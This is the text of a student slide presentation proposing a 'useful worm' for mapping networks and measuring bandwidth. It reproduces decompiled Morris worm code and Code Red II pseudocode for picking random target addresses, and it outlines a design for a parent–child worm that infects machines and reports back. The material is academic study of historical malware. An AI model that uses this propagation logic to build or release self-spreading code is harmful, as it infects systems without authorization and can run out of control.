the worm works for you matt weaver cs591. introduction the shockwave rider parc town crier vampire

The Worm Works For You

Matt Weaver

CS591

Introduction

The Shockwave RiderPARC

Town Crier Vampire

Goal

Use a worm to measure bandwidth and map a network.

Analyze classic worms. Morris Code Red

Determine the algorithm and architecture of a “useful worm”

Morris Mistake

Listen on a port: failure leads to infection.Machines were reinfected.

Morris checkother() /* 0x57d0 */ { int s, l8, l12, l16, optval; struct sockaddr_in sin; /* 16 bytes */ optval = 1; if ((random() % 7) == 3) return; /* 612 */ s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Make a socket to the localhost, using a link-time specific port */ bzero(&sin, sizeof(sin)); /* 16 */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */ sin.sin_port = 0x00005b3d; /* ??? */ if (connect(s, &sin, sizeof(sin)) < 0) { close(s); } else { l8 = MAGIC_2; /* Magic number??? */ if (write(s, &l8, sizeof(l8)) != sizeof(l8)) { close(s); return; } l8 = 0; if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) { close(s); return; } if (l8 != MAGIC_1) { close(s); return; }

l12 = random()/8; if (write(s, &l12, sizeof(l12)) != sizeof(l12)) { close(s); return; }

if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) { close(s); return; }

if (!((l12+l16) % 2)) pleasequit++; close(s); } sleep(5); s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Set the socket so that the address may be reused */ setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)); if (bind(s, &sin, sizeof(sin)) < 0) { close(s); return; } listen(s, 10); other_fd = s; return; }

Code Red II

Mountain DewCode Red utilized a clever distribution

scheme: not just the random IP trick.

Code Red II (Continued)

mtable[] = { 0xFFFFFFFF // go anywhere 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFF0000 // stay in class B 0xFFFF0000 // stay in class B 0xFFFF0000 }; // stay in class B # start with a random number that will be our new IP address. # I presume the random number generator is "random enough". newip = random(); # zero the UPPER octets of the random IP, which means that the # random number won't participate in the class A or class B # address mask = mtable[ random() & 0x7 ]; // locate a mask newip &= mask; // throw away rightmost bits # flip the mask around to operate on LOWER octets mask = ~mask; // flip the mask around myip = LOCAL_IP & mask; // throw away leftmost bits # newip contains the upper bits # myip contains the lower bits # join them: newip |= myip; if (newip starts with 127) try again // localhost if (newip starts with 224) try again // multicast if (newip matches LOCAL_IP) try again Connect to "newip" and try to infect

A New Worm

Root

Target

Target

Target

Target

Network

Logic

Write a text file (C on Win ~ on Unix)

Talk to parent. Find next machine. Infect next. Talk to parent. Timed death. Forced death (success).

Parent Child Next Target

Concerns

Running amok/re-infection.Termination

The Root Machine

Compiles UDP payload information from child instances.

Maps network.Dynamically generate viral payload

(binary).Provide control values.

Conclusion

Master’s Project: get it working safely.

Sources

Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.

CERT. http://www.cert.org/ Eren, Sinan. “Smashing the Kernel Stack for Fun and

Profit.” Phrack 60. Erickson, Jon. Hacking: The Art of Exploitation. No

Startch Press, 2003. Morris, Robert. Morris Worm Source Code.

http://www.foo.be/docs-free/morris-worm/worm/ Wikipedia, “Computer Worm”.

http://en.wikipedia.org/wiki/Computer_worm Wiedl, Steve. Unix Wiz. http://www.unixwiz.net/